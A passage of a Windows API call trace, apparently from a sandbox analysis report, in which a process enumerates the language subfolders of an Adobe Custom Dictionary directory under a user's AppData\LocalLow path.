ftLastAccessTime.dwLowDateTime=0xe82613f0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe82613f0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0246.633] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe82613f0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe82613f0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe82613f0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0246.633] FindClose (in: hFindFile=0x33f03c8 | out: hFindFile=0x33f03c8) returned 1 [0246.633] PeekMessageW (in: lpMsg=0x39aff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39aff08) returned 0 [0246.633] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xe0) returned 0x3b8c8b0 [0246.633] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0246.633] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xe0) returned 0x3b8c340 [0246.633] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0246.633] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\brt\\") returned="brt\\" [0246.633] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xd0) returned 0x3397a08 [0246.633] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\") returned="Adobe Custom Dictionary\\" [0246.633] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3b902b8 [0246.634] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x3b8d9b8 [0246.634] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\") returned="Dictionaries\\" [0246.634] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64eb50 [0246.634] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\") returned="Linguistics\\" [0246.634] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c41e0 [0246.634] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\") returned="Adobe\\" [0246.634] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d188 [0246.634] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0246.634] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x33c4ac0 [0246.634] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0246.634] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3b90300 [0246.634] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0246.634] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd518 [0246.634] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0246.634] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0246.634] PathFindFileNameW (pszPath="") returned="" [0246.634] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xe0) returned 0x3b8c340 [0246.634] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\brt\\*", lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeab70f70, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xeab70f70, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xeab70f70, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x33f03c8 [0246.635] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeab70f70, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xeab70f70, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xeab70f70, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0246.636] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeab70f70, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xeab70f70, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xeab70f70, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0246.636] FindClose (in: hFindFile=0x33f03c8 | out: hFindFile=0x33f03c8) returned 1 [0246.636] PeekMessageW (in: lpMsg=0x39aff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39aff08) returned 0 [0246.636] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xe0) returned 0x3b8c8b0 [0246.636] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0246.636] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xe0) returned 0x3b8c340 [0246.636] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0246.636] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\brz\\") returned="brz\\" [0246.636] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xd0) returned 0x3397a08 [0246.636] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\") returned="Adobe Custom Dictionary\\" [0246.636] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3b902b8 [0246.636] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x3b8d9b8 [0246.636] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\") returned="Dictionaries\\" [0246.636] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64eb50 [0246.636] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\") returned="Linguistics\\" [0246.636] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c41e0 [0246.636] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\") returned="Adobe\\" [0246.636] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d188 [0246.637] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0246.637] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x33c4ac0 [0246.637] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0246.637] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3b90300 [0246.637] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0246.637] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd518 [0246.637] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0246.637] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0246.637] PathFindFileNameW (pszPath="") returned="" [0246.637] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xe0) returned 0x3b8c340 [0246.637] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\brz\\*", lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xec6bf330, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xec6bf330, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xec6bf330, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x33f03c8 [0246.638] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xec6bf330, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xec6bf330, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xec6bf330, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0246.638] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xec6bf330, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xec6bf330, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xec6bf330, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0246.638] FindClose (in: hFindFile=0x33f03c8 | out: hFindFile=0x33f03c8) returned 1 [0246.638] PeekMessageW (in: lpMsg=0x39aff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39aff08) returned 0 [0246.638] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xe0) returned 0x3b8c8b0 [0246.638] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0246.638] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\dan\\") returned="dan\\" [0246.638] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\") returned="Adobe Custom Dictionary\\" [0246.638] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\") returned="Dictionaries\\" [0246.639] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\") returned="Linguistics\\" [0246.639] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\") returned="Adobe\\" [0246.639] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0246.639] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0246.639] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0246.639] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0246.639] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0246.639] PathFindFileNameW (pszPath="") returned="" [0246.639] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\dan\\*", lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeb4758f0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xeb4758f0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xeb4758f0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x33f03c8 [0246.639] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeb4758f0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xeb4758f0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xeb4758f0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0246.640] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeb4758f0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xeb4758f0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xeb4758f0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0246.640] FindClose (in: hFindFile=0x33f03c8 | out: hFindFile=0x33f03c8) returned 1 [0246.640] PeekMessageW (in: lpMsg=0x39aff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39aff08) returned 0 [0246.640] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0246.640] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\dut\\") returned="dut\\" [0246.640] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\") returned="Adobe Custom Dictionary\\" [0246.640] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\") returned="Dictionaries\\" [0246.640] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\") returned="Linguistics\\" [0246.640] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\") returned="Adobe\\" [0246.640] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0246.640] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0246.640] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0246.640] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0246.640] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0246.641] PathFindFileNameW (pszPath="") returned="" [0246.641] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\dut\\*", lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xebdabf50, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xebdabf50, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xebdabf50, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x33f03c8 [0246.641] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xebdabf50, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xebdabf50, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xebdabf50, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0246.641] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xebdabf50, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xebdabf50, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xebdabf50, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0246.641] FindClose (in: hFindFile=0x33f03c8 | out: hFindFile=0x33f03c8) returned 1 [0246.641] PeekMessageW (in: lpMsg=0x39aff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39aff08) returned 0 [0246.641] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0246.641] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\eng\\") returned="eng\\" [0246.641] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\") returned="Adobe Custom Dictionary\\" [0246.641] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\") returned="Dictionaries\\" [0246.641] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\") returned="Linguistics\\" [0246.642] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\") returned="Adobe\\" [0246.642] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0246.642] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0246.642] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0246.642] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0246.642] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0246.642] PathFindFileNameW (pszPath="") returned="" [0246.642] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\eng\\*", lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe9487bb0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe9487bb0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe9487bb0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x33f03c8 [0246.642] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe9487bb0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe9487bb0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe9487bb0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0246.642] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe9487bb0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe9487bb0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe9487bb0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0246.642] FindClose (in: hFindFile=0x33f03c8 | out: hFindFile=0x33f03c8) returned 1 [0246.642] PeekMessageW (in: lpMsg=0x39aff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39aff08) returned 0 [0246.642] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0246.643] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\frn\\") returned="frn\\" [0246.643] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\") returned="Adobe Custom Dictionary\\" [0246.643] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\") returned="Dictionaries\\" [0246.643] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\") returned="Linguistics\\" [0246.643] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\") returned="Adobe\\" [0246.643] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0246.643] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0246.643] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0246.643] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0246.643] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0246.643] PathFindFileNameW (pszPath="") returned="" [0246.643] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\frn\\*", lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe9d9af90, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe9d9af90, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe9d9af90, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x33f03c8 [0246.644] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe9d9af90, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe9d9af90, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe9d9af90, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0246.644] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe9d9af90, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe9d9af90, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe9d9af90, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0246.644] FindClose (in: hFindFile=0x33f03c8 | out: hFindFile=0x33f03c8) returned 1 [0246.644] PeekMessageW (in: lpMsg=0x39aff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39aff08) returned 0 [0246.644] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0246.644] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\grm\\") returned="grm\\" [0246.644] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\") returned="Adobe Custom Dictionary\\" [0246.644] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS 